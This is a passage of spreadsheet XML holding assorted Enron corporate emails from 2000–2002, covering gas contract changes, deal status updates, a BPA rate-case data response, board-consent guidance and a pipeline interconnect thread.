_x000D_
[IMAGE]	_x000D_
</t>
  </si>
  <si>
    <t>Tue, 11 Jul 2000 05:19:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'robert.allwein@enron.com', 'joann.collins@enron.com', 'katherine.kelly@enron.com', 'sherry.anastas@enron.com', 'elizabeth.hernandez@enron.com', 'brenda.fletcher@enron.com', 'marlene.hilliard@enron.com', 'mary.franklin@enron.com', 'victor.lamadrid@enron.com'})</t>
  </si>
  <si>
    <t>CGAS</t>
  </si>
  <si>
    <t>I made the following changes so we can track and pay the KO Transmission _x000D_
invoice.  I terminated deal 236178 (CGAS k#60094) effective 6/30/2000.  I _x000D_
believe Joann has been using this deal to path the KO Transmission activity.  _x000D_
I created deal 327869 effective 2/1/2000 - this is a CGAS contract with KO _x000D_
Transmission as the service provider.  We will still do the noms via CGAS on _x000D_
this contract.  However, we will pay KO Transmission for the transport _x000D_
expense._x000D_
_x000D_
_x000D_
According to KO, we have not paid our Feb - May invoices.  I set these _x000D_
charges up on deal 327869 as demand charges.  The amount are small.  _x000D_
Beginning with July, we will reflect a usage charge on deal 327869._x000D_
_x000D_
Questions??</t>
  </si>
  <si>
    <t>Fri, 21 Jul 2000 09:00:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'paige.cox@enron.com'})</t>
  </si>
  <si>
    <t>Re: Status: Nortel Box set up at home</t>
  </si>
  <si>
    <t>Directions to my house._x000D_
_x000D_
_x000D_
We will see between 5:15 and 5:30 Monday._x000D_
_x000D_
West of the Galleria, take San Felipe down to Fountainview and take a left.  _x000D_
You will pass the Rice Epicurean store on your right.  Go straight to the _x000D_
first light, take a right on Burgoyne.  You will pass through Potomac and _x000D_
Nantucket, continue into Briar Grove neighborhood.  When you come to the stop _x000D_
sign, take a right on Briar Ridge.  My house is on the southwest corner of _x000D_
the next intersection, Meadow Lake and Briar Ridge.  My ophone number is _x000D_
713-780-1022._x000D_
_x000D_
Sincerely,_x000D_
Mike Grigsby</t>
  </si>
  <si>
    <t>Mon, 12 Mar 2001 01:47:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'steve.bigalow@enron.com'})</t>
  </si>
  <si>
    <t>Re: 3/12</t>
  </si>
  <si>
    <t xml:space="preserve">steve,_x000D_
_x000D_
Do you see an intraday bottom?_x000D_
_x000D_
Vince_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Steve Bigalow@ENRON_x000D_
03/12/2001 08:13 AM_x000D_
To: Vince J Kaminski/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: 3/12_x000D_
_x000D_
Good morning,_x000D_
_x000D_
Watch for a severe selloff today. But it should turn around and the buyers _x000D_
will bring it back up. I am anticipating that this will be the reversal day _x000D_
for the NAS&gt;_x000D_
_x000D_
Steve_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Philly Enquirer - Louise Kitchen - Sunday, Aug. 13/00</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Steven J Kean/HOU/EES on 08/16/2000 08:16 _x000D_
AM ---------------------------_x000D_
_x000D_
_x000D_
Cindy Derecskey@ENRON_x000D_
08/14/2000 03:43 PM_x000D_
To: Louise Kitchen/HOU/ECT@ECT, Kal Shah/HOU/ECT@ECT, Mark _x000D_
Palmer/Corp/Enron@ENRON, Karen Denne/Corp/Enron@ENRON, Meredith _x000D_
Philipp/Corp/Enron@ENRON, Steven J Kean/HOU/EES@EES_x000D_
cc:  _x000D_
Subject: Philly Enquirer - Louise Kitchen - Sunday, Aug. 13/00_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Sun, 4 Feb 2001 10:40:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Update on what I'm working on.</t>
  </si>
  <si>
    <t xml:space="preserve">Hi there._x000D_
_x000D_
Nothings comes off the list.  New additions are as follows:_x000D_
_x000D_
New transaction with Morgan Stanley Dean Witter, relating to the creation of _x000D_
a jointly owned control area to address generation,  transmission, and retail _x000D_
load delivery.  It is brand-spanking new, so I don't know much more than _x000D_
this.  It is being handled by Ozzie Pagan._x000D_
_x000D_
New opportunity with New Jersey Natural to develop projects using Fuel _x000D_
Cells.  Heather Kroll is the contact._x000D_
_x000D_
Sale of Blue Dog (GE) turbine.  Likely buyer (at last word) is NRG.  Could be _x000D_
complicated if GE protests._x000D_
_x000D_
There's a rumor that we are buying some new turbines from GE, but I haven't _x000D_
been contacted.  The rumor came from _x000D_
GE reps, who asked if I was working on it.  Sheila isn't handling, either, _x000D_
last I knew._x000D_
_x000D_
Everything else is the same.  I expect to be in NYC in the middle of the week _x000D_
to continue negotiations on the Co Op City deal (with Mark Bernstein)._x000D_
_x000D_
Please let me know if you have any questions._x000D_
_x000D_
Kay_x000D_
---------------------- Forwarded by Kay Mann/Corp/Enron on 02/04/2001 06:27 _x000D_
PM ---------------------------_x000D_
_x000D_
_x000D_
Kay Mann_x000D_
01/29/2001 07:36 AM_x000D_
To: Barbara N Gray/HOU/ECT@ECT, Jeffrey T Hodge/HOU/ECT@ECT_x000D_
cc:  _x000D_
_x000D_
Subject: Update on what I'm working on._x000D_
_x000D_
Per Barbara's request, here's a summary of much of what I'm working on:_x000D_
_x000D_
Co Op City asset management arrangement:  In this deal, Enron would build a _x000D_
small power generation facility for a housing co op in the Bronx, Co Op _x000D_
City.  We would arrange for O &amp; M services, supply the fuel (primarily gas), _x000D_
market their excess power, and, for the first 4 years, take 1/2 the offtake.  _x000D_
We are currently working to structure the transaction to keep if off the _x000D_
balance sheet and maximize the mark.  We are working on  a term sheet, and I _x000D_
will be in NYC later this week to continue negotations with the customer.  _x000D_
Mark Bernstein is the originator, Debbie Chance is the developer, and NEPCO _x000D_
Houston is  involved.  I discussed outside counsel with Jeff, and I would _x000D_
like to use John Klauberg at LeBeouf.  _x000D_
_x000D_
Sell of two development projects in Illinois.  Two of the sites we have _x000D_
developed (sans equipment) are up for sale, and Fred Mitro has contacted me _x000D_
about supporting the transaction.  Lisa Mellencamp had previously contacted _x000D_
Bracewell about working on it, but I'm a little concerned about the amount of _x000D_
experience of the person they have designated.  I've asked Clark Thompson for _x000D_
some information on his background.  _x000D_
_x000D_
SW 501d - our claim against SWestinghouse, and possible sale of the _x000D_
equipment.  We have issues with the vendor concerning the late delivery of _x000D_
this equipment.  We are also trying to sell the equipment (a _x000D_
turbine/generator set) to Calpine.  _x000D_
_x000D_
Fuel Cells - last year Enron made a $5million investment in Fuel Cells, a _x000D_
company which is developing an almost green form of power generation.  We _x000D_
received contingent warrants which we can cash in if we arrange for 55 mw.  _x000D_
We are working with an instrumentality of the state of Connecticut about them _x000D_
buying 26 megawatts. We are working on the purchase agreement with FC, and _x000D_
the project development agreement with the State.  It is quiet right now, as _x000D_
funding is figured out._x000D_
_x000D_
There's TurboPark maintenance stuff which pops up weekly._x000D_
_x000D_
GE - Sheila and I have a weekly phone conference with GE to work on a _x000D_
standard contract for buying turbines.  I've heard a rumor that we will be _x000D_
buying some more, although neither Sheila nor I have been contacted yet.  _x000D_
_x000D_
I think this is a fair summary of the big ticket items._x000D_
_x000D_
Kay_x000D_
</t>
  </si>
  <si>
    <t>frozenset({'andy.zipper@enron.com', 'savita.puthigai@enron.com', 'rahil.jafry@enron.com'})</t>
  </si>
  <si>
    <t>Incomplete Nymex Converter for 12/11 through 12/15/</t>
  </si>
  <si>
    <t xml:space="preserve">Unfortunately, the Nymex nor the Wall Street Journal has updated there _x000D_
information for 12/15/00._x000D_
Therefore, I will not be able to send you a complete version of my Nymex _x000D_
Converter._x000D_
I will continue to check on a daily basis and keep all of you posted._x000D_
_x000D_
Thanks,_x000D_
Simone_x000D_
_x000D_
_x000D_
---------------------- Forwarded by Simone La Rose/HOU/ECT on 12/19/2000 _x000D_
05:02 PM ---------------------------_x000D_
_x000D_
_x000D_
Simone La Rose_x000D_
12/18/2000 05:28 PM_x000D_
To: Andy Zipper/Corp/Enron@Enron_x000D_
cc: Jennifer deBoisblanc Denny/HOU/ECT@ECT, Torrey Moorer/HOU/ECT@ECT, Peter _x000D_
Berzins/NA/Enron@Enron, Matt Motsinger/HOU/ECT@ECT _x000D_
Subject: Incomplete Nymex Converter for 12/11 through 12/15/_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 14 Aug 2000 04:39:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'filuntz@aol.com'})</t>
  </si>
  <si>
    <t xml:space="preserve">A scathing AP article against Governor Davis concerning his inaction with the _x000D_
California crisis. Davis is facing two issues. Sign the current rollback bill _x000D_
that is going through the legislature and upset the energy industry, or veto _x000D_
the bill and have many voters upset at him. Governor Davis is aware of the _x000D_
upcoming elections for members in his party, as well as the 2002 governor _x000D_
election and knows that his decision may cost himself and other members of _x000D_
his party election wins. Also, there is now talks that during August 21st PUC _x000D_
meeting the governor will suggest rate rollback for San Diego  to July 1998 _x000D_
rates. This is a complete 180 degree turn from his August 3rd PUC meeting _x000D_
where he said he would steer clear of rate rollbacks or freezes and push for _x000D_
only a rebate._x000D_
_x000D_
_x000D_
Attached is a personal interest type story providing the general publics view _x000D_
of the whole California power situation._x000D_
</t>
  </si>
  <si>
    <t>Tue, 27 Nov 2001 07:41:48 -0800 (PST)</t>
  </si>
  <si>
    <t>RE: meeting today</t>
  </si>
  <si>
    <t>I'll get back with you asap.  Michelle_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Howard, Kevin A.  _x000D_
Sent:	Tuesday, November 27, 2001 6:58 AM_x000D_
To:	Cash, Michelle_x000D_
Subject:	meeting today_x000D_
_x000D_
Do we need to have our meeting today? I could sure use the time for some other meetings._x000D_
_x000D_
Kevin</t>
  </si>
  <si>
    <t>Tue, 10 Apr 2001 09:58:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'sawestenberg@bpa.gov'})</t>
  </si>
  <si>
    <t>request_number:  PG-BPA: 132_x000D_
firstname:  Sarah_x000D_
lastname:  Westenberg_x000D_
e-mail:  sawestenberg@bpa.gov_x000D_
exhibit_wp-02-e-:  BPA-77_x000D_
page_numbers:  9_x000D_
request_text:  Please provide a short description of each line in the two=_x000D_
=20_x000D_
tables (lines 4-24) including (a) a comparison of the differences between t=_x000D_
he=20_x000D_
two tables (either the reasons for any differences in amounts for a line=20_x000D_
description that is the same in both tables, or the reason for any=20_x000D_
differences in the logic of the calculations), and (b) a =01&amp;crosswalk=018 =_x000D_
showing=20_x000D_
how each line in each table corresponds to a variable or equation (or both)=_x000D_
=20_x000D_
in section f of the GRSPs beginning on p. 15 of Attachment A to this=20_x000D_
testimony._x000D_
_x000D_
_x000D_
_x000D_
response_text:_x000D_
The following two tables are excerpted out of WP-02-E-BPA-77, page 9, lines=_x000D_
=20_x000D_
4-26._x000D_
_x000D_
_x000D_
Table Illustrating JCG Method_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Table Illustrating BPA Method_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Before beginning the comparison of the two tables, it should be pointed out=_x000D_
=20_x000D_
that the tables calculate gross augmentation costs.  We left out the step=_x000D_
=20_x000D_
that calculates the net augmentation costs.  As a result, the =01&amp;Total=018=_x000D_
 line=20_x000D_
dollar amounts ($6M and $6.2M in the JCG table, and $6M and $6M in the BPA=_x000D_
=20_x000D_
table) should all be reduced by the amount of augmentation resale revenue. =_x000D_
=20_x000D_
However, since this modification will not affect the comparison requested i=_x000D_
n=20_x000D_
the data request, let us continue as if the =01&amp;Total=018 line dollar amoun=_x000D_
ts are=20_x000D_
already net of the augmentation revenue. See the attachment to the data=20_x000D_
response._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Another item that may be confusing is the item labeled =01&amp;Pre-purchase =01=_x000D_
) 0 day=20_x000D_
rule=018.  This is the incremental cost associated with purchases made betw=_x000D_
een=20_x000D_
the 120-day cut-off and the 0-day cut-off._x000D_
_x000D_
Also, a crosswalk of each table showing how it corresponds to a variable or=_x000D_
=20_x000D_
equation in section f is not possible since section f reflects the BPA=20_x000D_
method, not the JCG method.  Perhaps an overview of BPA=01,s perspective on=_x000D_
 the=20_x000D_
difference between the JCG method and the BPA method will be helpful._x000D_
_x000D_
JCG calculated the augmentation costs using two different cost pools, one=_x000D_
=20_x000D_
cost pool for the Slice product (using the 120 day rule), and a second cost=_x000D_
=20_x000D_
pool for all other products (using the 0 day rule).  The products then=20_x000D_
collected a portion of the augmentation costs associated with a specific=20_x000D_
rule.  When these two cost pools yield different net augmentation costs=20_x000D_
(which they usually will unless all of the augmentation is purchased under=_x000D_
=20_x000D_
the 120-day rule), the JCG method doesn=01,t collect the actual amount of e=_x000D_
ither=20_x000D_
of those pools from Slice or non-Slice.  Rather it collects a proportion of=_x000D_
=20_x000D_
each of the cost pools._x000D_
_x000D_
In contrast to the JCG method, the BPA method distributes the costs using t=_x000D_
he=20_x000D_
120-day rule proportionally between the Slice and non-Slice products, and=_x000D_
=20_x000D_
then assesses all the incremental cost from using the 0-day rule rather tha=_x000D_
n=20_x000D_
the 120-day rule to the non-Slice products.  In contrast to JCG method, thi=_x000D_
s=20_x000D_
assures that all the actual incremental net augmentation costs calculated b=_x000D_
y=20_x000D_
replacing the =01&amp;120-day=018 rule with the =01&amp;0-day=018 rule are recovere=_x000D_
d  from=20_x000D_
purchasers of non-Slice power products.  In addition, this also assures tha=_x000D_
t=20_x000D_
purchasers of the Slice product do not bear any nearer term market prices=_x000D_
=20_x000D_
fluctuations._x000D_
_x000D_
Now for a short description of each line in the two tables, and a compariso=_x000D_
n=20_x000D_
of the differences.  The example assumes that we don=01,t actually purchase=_x000D_
 all=20_x000D_
of our augmentation, that some of it is served from BPA=01,s secondary, or =_x000D_
is=20_x000D_
bought in the spot market._x000D_
_x000D_
=01&amp;Pre-purchase =01) 120 day rule=018 is the total cost of augmentation pu=_x000D_
rchases=20_x000D_
made at least 120 days prior to the month of delivery.  This amount is $2M =_x000D_
in=20_x000D_
both tables in both columns.  This amount represents the sum of DIURNALACA=_x000D_
=20_x000D_
for the six-month period.  This would have represented DIURNALACA(S) in the=_x000D_
=20_x000D_
GRSPs proposed by the JCG in their Direct Case._x000D_
_x000D_
=01&amp;Pre-purchase =01) 0 day rule=018 is the additional cost of pre-purchase=_x000D_
s made less=20_x000D_
than 120 days prior to the month of delivery.  This amount is $1M in both=_x000D_
=20_x000D_
tables in the non-Slice column.  The 0-day rule pre-purchases are not=20_x000D_
applicable to the Slice product, thus the N/A in the Slice column in both=_x000D_
=20_x000D_
tables.  If =01&amp;Pre-purchase =01) 120 day rule=018 and =01&amp;Pre-purchase =01=_x000D_
) 0 day rule=018=20_x000D_
were summed the sum would represent DIURNALACA(NS) in the GRSPs proposed by=_x000D_
=20_x000D_
the customers.  Note that the Pre-purchase =01) 0 day rule appears in a=20_x000D_
different row in the BPA table since BPA has proposed that these incrementa=_x000D_
l=20_x000D_
cost enter the calculations at a different point._x000D_
_x000D_
Short position is the cost of the amount of AAMTA that is not pre-purchased=_x000D_
. =20_x000D_
This is the amount that is valued at PRICE in the GRSPs.  In the JCG, the=_x000D_
=20_x000D_
short position is different between the Slice and non-Slice columns.  This =_x000D_
is=20_x000D_
because the example has BPA purchasing some additional augmentation ($1M=20_x000D_
worth) under the 0-day rule, and there is a corresponding reduction in the=_x000D_
=20_x000D_
value of BPA=01,s short position.  The change also reflects that the short=_x000D_
=20_x000D_
position is valued using different PRICEs for the 120 day rule and the 0 da=_x000D_
y=20_x000D_
rule.  In the BPA example, Short position is $3M for both Slice and non-Sli=_x000D_
ce=20_x000D_
products, and the difference (-$0.8M) is found in the row =01&amp;Short positio=_x000D_
n 0=20_x000D_
day rule=018_x000D_
_x000D_
=01&amp;Buydown=018 is the cost of all buydowns.  It is the same in both tables=_x000D_
, for=20_x000D_
both Slice and non-Slice products.  In the examples BPA spent $1M buying do=_x000D_
wn=20_x000D_
load._x000D_
_x000D_
=01&amp;Total=018 is the gross cost of augmentation.  As stated above, it shoul=_x000D_
d be=20_x000D_
reduced by the augmentation resale revenue.  To continue on, let us assume=_x000D_
=20_x000D_
that =01&amp;Total=018 has been reduced by augmentation resale revenue, and rep=_x000D_
resents=20_x000D_
the net augmentation costs.  In the JCG  example, =01&amp;Total=018 is $6M for =_x000D_
Slice=20_x000D_
and $6.2M for non-Slice.  These would represent NACA(S) and NACA(NS) in the=_x000D_
=20_x000D_
GRSPs proposed by the JCG in their Direct Case..  In the BPA example, Total=_x000D_
=20_x000D_
is $6M for both Slice and non-Slice.  This represents NACA in the BPA GRSPs=_x000D_
._x000D_
_x000D_
=01&amp;Percent of CRACable revenue=018 is the same in both tables.  The exampl=_x000D_
e shows=20_x000D_
that the Slice revenue is 30% of the total CRACable revenue, and the=20_x000D_
non-Slice revenue is 70% of the total CRACable revenue._x000D_
_x000D_
=01&amp;LB CRAC Costs=018 only appears in the BPA example.  It is the NACA dist=_x000D_
ributed=20_x000D_
between Slice and non-Slice products in proportion to actual revenue._x000D_
_x000D_
=01&amp;Pre-purchase 0 day rule=018 and =01&amp;Short position 0 day rule=018 are t=_x000D_
he changes in=20_x000D_
the valuation of pre-purchases ($1M) and Short position (-$0.8M) between th=_x000D_
e=20_x000D_
120 day rule and the 0 day rule.  The net difference of $0.2M is equivalent=_x000D_
=20_x000D_
to the difference that is seen in =01&amp;Total=018 in the JCG example (the dif=_x000D_
ference=20_x000D_
between $6M and $6.2M).  This difference is also equivalent to NACDIFF in t=_x000D_
he=20_x000D_
BPA GRSPs._x000D_
_x000D_
=01&amp;Total LB CRAC Cost(s)=018 is the cost that the Slice and non-Slice grou=_x000D_
ps true=20_x000D_
up to.  In the JCG example, the Slice product trues up to 30% of $6M, or=20_x000D_
$1.8M while the non-Slice products true up to 70% of $6.2M for a total from=_x000D_
=20_x000D_
both groups of $6.14M.  In BPA=01,s example, the Slice product pays 30% of =_x000D_
$6M=20_x000D_
or $1.8M (the same as in the JCG example) while the non-Slice products pay=_x000D_
=20_x000D_
70% of $6M plus the net difference between valuation of net augmentation=20_x000D_
costs using the 120 day rule and valuation using the 0 day rule.  The=20_x000D_
non-Slice amount is $4.2M plus $0.2M or $4.4M._x000D_
_x000D_
_x000D_
_x000D_
The following information is from the web server:_x000D_
1.  Logon: IUSR_GRANITE_x000D_
2.  Remote Host:  53.180.74.220_x000D_
3.  Remote IP Address:  53.180.74.220_x000D_
4.  Form URL: =20_x000D_
http://www.bpa.gov/power/secure/psp/ratecase/discovery/wp_02_response.html_x000D_
5.  Browser Client:  Mozilla/4.0 (compatible; MSIE 5.01; Windows NT; BPA 4.=_x000D_
01=20_x000D_
SP2; BPA 5.01 SP1)</t>
  </si>
  <si>
    <t>Fri, 30 Mar 2001 01:41:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'janice.moore@enron.com', 'genia.fitzgerald@enron.com', 'richard.sanders@enron.com', 'carlos.sole@enron.com', 'justin.boyd@enron.com', 'lou.stoler@enron.com', 'david.minns@enron.com', 'mark.taylor@enron.com', 'mark.greenberg@enron.com', 'ed.iii@enron.com', 'gerald.nemec@enron.com', 'sara.shackleton@enron.com', 'mark.powell@enron.com', 'james.grace@enron.com', 'jane.mcbride@enron.com', 'francisco.leite@enron.com', 'kathleen.carnahan@enron.com', 'mary.ogden@enron.com', 'rahul.saxena@enron.com', 'kimberlee.bennick@enron.com', 'linda.guinn@enron.com', 'andrea.calo@enron.com', 'mary.cook@enron.com', 'lance.schuler-legal@enron.com', 'sandi.braband@enron.com', 'larry.pardue@enron.com', 'bob.carter@enron.com', "denis.o'connell@enron.com", 'roseann.engeldorf@enron.com', 'susan.bailey@enron.com', 'marcus.nettelton@enron.com', 'peter.keohane@enron.com', 'sheila.tweed@enron.com', 'coralina.rivera@enron.com', 'janet.moore@enron.com', 'barbara.gray@enron.com', 'daniel.rogers@enron.com', 'mark.elliott@enron.com', 'chris.gaffney@enron.com', 'dan.hyvl@enron.com', 'greg.johnston@enron.com', 'wayne.gresham@enron.com', 'merrill.haas@enron.com', 'kay.mann@enron.com', 'shawna.flynn@enron.com', 'david.portz@enron.com', 'julia.murray@enron.com', 'alan.aronowitz@enron.com', 'steve.hooser@enron.com', 'matt.maxwell@enron.com', 'leslie.hansen@enron.com', 'edmund.cooper@enron.com', 'stuart.zisman@enron.com', 'mark.evans@enron.com', 'randy.young@enron.com', 'christian.yoder@enron.com', 'matthias.lee@enron.com', 'nancy.corbet@enron.com', 'jeffrey.hodge@enron.com', 'sarah.bruck@enron.com', 'peggy.banczak@enron.com', 'anne.koehler@enron.com', 'barton.clark@enron.com', 'laurie.mayer@enron.com', 'angela.davis@enron.com', 'stacy.dickson@enron.com', 'robert.walker@enron.com', 'kay.young@enron.com', 'robert.quick@enron.com', 'debra.perlingiere@enron.com', 'harry.collins@enron.com', 'nony.flores@enron.com', 'michael.robison@enron.com', 'martin.rosell@enron.com', 'peter.vecchio@enron.com', 'robert.george@enron.com', 'cheryl.nelson@enron.com', 'michelle.cash@enron.com', 'lisa.mellencamp@enron.com', 'travis.mccullough@enron.com', 'dominic.carolan@enron.com', 'karen.jones@enron.com', 'brent.hendry@enron.com', 'eddy.daniels@enron.com', 'deb.korkmas@enron.com', 'andrew.edison@enron.com', 'bruce.lundstrom@enron.com', 'dale.rasmussen@enron.com', 'martha.braddy@enron.com', 'ann.white@enron.com', 'teresa.bushman@enron.com', 'elizabeth.sager@enron.com', 'ned.crady@enron.com', 'paul.simons@enron.com', 'john.viverito@enron.com', 'dan.lyons@enron.com', 'limor.nissan@enron.com', 'mary.heinitz@enron.com', 'frank.sayre@enron.com', 'tana.jones@enron.com', 'carol.clair@enron.com', 'robert.bruce@enron.com', 'angeline.poon@enron.com'})</t>
  </si>
  <si>
    <t>Unanimous Consent of Directors</t>
  </si>
  <si>
    <t xml:space="preserve"> It has become customary to prepare Unanimous Consents of Directors for many _x000D_
transactions even if such actions are not required by the relevant By-laws _x000D_
and/or Certificate of Incorporation.  Please consider carefully whether _x000D_
Unanimous Consents of Directors are necessary or appropriate in a particular _x000D_
transaction, i.e., the transaction is a significant transaction or evidence _x000D_
of authority is required for a legal opinion.  When in doubt, please review _x000D_
the By-laws and Certificate of Incorporation of the relevant entity and _x000D_
discuss the matter with a member of the Office of the General Counsel._x000D_
_x000D_
Thank you.</t>
  </si>
  <si>
    <t>Thu, 2 Nov 2000 10:53:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Japan, India and California, too?</t>
  </si>
  <si>
    <t>Enron opens an office in Japan.  Get the details in eBiz._x000D_
_x000D_
Also in this issue:_x000D_
FERC suggests overhaul for California_x000D_
ENA's focus on upstream services_x000D_
Cyber Cafe in Dabhol_x000D_
_x000D_
It's all in the latest eBiz.  Go to home.enron.com, click Publications, then _x000D_
click eBiz, and "eBiz November 3, 2000."</t>
  </si>
  <si>
    <t>Mon, 25 Mar 2002 12:58:12 -0800 (PST)</t>
  </si>
  <si>
    <t>FW: Questar San Juan Hub Interconnect</t>
  </si>
  <si>
    <t xml:space="preserve">FYI, Kim._x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Chanley, Earl  _x000D_
Sent:	Wednesday, February 06, 2002 5:58 PM_x000D_
To:	Watson, Kimberly_x000D_
Subject:	RE: Questar San Juan Hub Interconnect_x000D_
_x000D_
Kim_x000D_
_x000D_
The in-service date of May 1, will be very difficult to attain. Since the bankruptcy filing, vendors have been very reluctant to ship material prior to it being prepaid (Daniels, Fisher, Rosemont, other). These are the vendors of instrumentation required for the interconnect. Questar may be able to purchase material, but some of the items can have up to a 60 day delivery. (From time PA approved and funded to in-service will be 75 days at most. We have worked with Daniels on a chromatograph on another project and prepayment has taken 45 days alone. Daniels is not set up for prepayments as they bill off an invoice and the main office and accounting had to create an invoice for a chromatograph that had not been delivered. Not the usual mode of operations. _x000D_
The I/C design is for a UltraSonic meter and this is dependent on their testing schedule ( Canada or Kansas are the only two places to test to 100% of design). Will confirm testing schedule and delivery dates with UltraSonic ASAP. _x000D_
We will try to complete the I/C with the earliest in-service date possible, but with conditions as they are, a realistic date would be June 15, 2002. _x000D_
If you have questions or issues, please let me know._x000D_
_x000D_
_x000D_
Thanks_x000D_
Earl Chanley_x000D_
505-625-8031_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Watson, Kimberly  _x000D_
Sent:	Wednesday, February 06, 2002 9:27 AM_x000D_
To:	Chanley, Earl_x000D_
Cc:	Abdmoulaie, Mansoor_x000D_
Subject:	RE: Questar San Juan Hub Interconnect_x000D_
_x000D_
Earl,_x000D_
_x000D_
We are looking at putting the metering facilities on their ROW (also, I think we will have to purchase about 50ft of ROW from ElPaso to get to Questar's property).  As you look at this, if for some reason we cannot obtain ElPaso ROW, we will have to look at Plan B which would be to put the metering on our ROW.  Our in-service date is May 1.  If you think that May 1 may be difficult due to receiving the parts/materials on a timely basis because of the issues that vendors may have with us because of recent Enron events, please let me know.  Questar has already informed us that they would help obtain parts/materials to our specifications if it helps achieve an in-service date of May 1._x000D_
_x000D_
Thanks, Kim._x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Chanley, Earl  _x000D_
Sent:	Wednesday, February 06, 2002 9:02 AM_x000D_
To:	Watson, Kimberly_x000D_
Subject:	RE: Questar San Juan Hub Interconnect_x000D_
_x000D_
Kim_x000D_
_x000D_
Has a location, Theirs or TW land/ROW, been settled and when is the required in-service date?_x000D_
_x000D_
Thanks_x000D_
Earl Chanley_x000D_
505-625-8031_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Watson, Kimberly  _x000D_
Sent:	Tuesday, February 05, 2002 3:40 PM_x000D_
To:	Lokey, Teb; Geaccone, Tracy; Abdmoulaie, Mansoor; Chanley, Earl; Roensch, David; Whippo, Jeff; Schoolcraft, Darrell; Guthrie, Robert_x000D_
Cc:	Rapp, Bill_x000D_
Subject:	Questar San Juan Hub Interconnect_x000D_
_x000D_
All,_x000D_
_x000D_
Please see the attached Interconnect Agreement with Questar.  I wanted you all to have a look at what we believe is the final draft.  It is a fairly standard, fully reimbursable interconnect with Questar.  Transwestern will own and operate the interconnect.  You will notice that Questar has requested a "Payment Plan" that details when they will pay Transwestern for the interconnect due to the recent Enron events.  If anyone has any questions or concerns about the timing of these payments, please give me a call.  Also, you will notice this interconnect may not be subject to the CIAC tax gross up, but to protect ourselves, we have added language in Para 3.2 that protects us financially if the IRS ever comes back to determine that this interconnect is subject to the CIAC tax.   Robert Guthrie with the tax department has worked with us to develop this language.  _x000D_
_x000D_
We hope to execute this Agreement this week.  If you have any comments, please let me know.  After execution, we will forward a final copy to you for your files._x000D_
_x000D_
Thanks, _x000D_
Kim    713-853-3098_x000D_
_x000D_
 &lt;&lt; File: Questar So Trails Hub Interconnect 02-05-02.doc &gt;&gt; _x000D_
 </t>
  </si>
  <si>
    <t>Thu, 18 Oct 2001 10:20:40 -0700 (PDT)</t>
  </si>
  <si>
    <t>12:20:30 Synchronizing Mailbox 'Taylor, Mark E (Legal)'_x000D_
12:20:30 Synchronizing Hierarchy_x000D_
12:20:31 Synchronizing Favorites_x000D_
12:20:31 Synchronizing Folder 'Inbox'_x000D_
12:20:38 	   9 item(s) added to offline folder_x000D_
12:20:38 	   36 item(s) deleted in offline folder_x000D_
12:20:38 	   1 view(s)/form(s) updated in offline folder_x000D_
12:20:38 Synchronizing Folder 'Outbox'_x000D_
12:20:38 Synchronizing Folder 'Sent Items'_x000D_
12:20:38 	   6 item(s) added to offline folder_x000D_
12:20:39 Synchronizing Folder 'Calendar'_x000D_
12:20:39 	   2 item(s) added to offline folder_x000D_
12:20:39 	   2 item(s) updated in offline folder_x000D_
12:20:39 	   1 view(s)/form(s) updated in offline folder_x000D_
12:20:39 Synchronizing Folder 'Contacts'_x000D_
12:20:39 Synchronizing Folder 'Drafts'_x000D_
12:20:40 Synchronizing Folder 'Tasks'_x000D_
12:20:40 	   1 item(s) updated in offline folder_x000D_
12:20:40 Synchronizing Folder 'Journal'_x000D_
12:20:40 Synchronizing Folder 'Notes'_x000D_
12:20:40 Synchronizing Views_x000D_
12:20:40 Synchronizing Forms_x000D_
12:20:40 Done</t>
  </si>
  <si>
    <t>Thu, 8 Jun 2000 04:48:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: EOL / Credit / GCP Responses 6/7/00</t>
  </si>
  <si>
    <t xml:space="preserve">Question? I assume "open" means able to trade without collateral._x000D_
_x000D_
_x000D_
From: Tana Jones@ECT on 06/07/2000 06:35 PM CDT_x000D_
To: Alan Aronowitz/HOU/ECT@ECT, Jeffrey T Hodge/HOU/ECT@ECT, Stacy E _x000D_
Dickson/HOU/ECT@ECT, Leslie Hansen/HOU/ECT@ECT, Harry M Collins/HOU/ECT@ECT, _x000D_
David Portz/HOU/ECT@ECT, Elizabeth Sager/HOU/ECT@ECT, David _x000D_
Minns/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Marie Heard/Enron _x000D_
Communications@Enron Communications, Robbi Rossi/Enron Communications@Enron _x000D_
Communications_x000D_
cc:  _x000D_
_x000D_
Subject: EOL / Credit / GCP Responses 6/7/00_x000D_
_x000D_
_x000D_
----- Forwarded by Tana Jones/HOU/ECT on 06/07/2000 06:35 PM -----_x000D_
_x000D_
	Tom Moran_x000D_
	06/07/2000 05:52 PM_x000D_
		 _x000D_
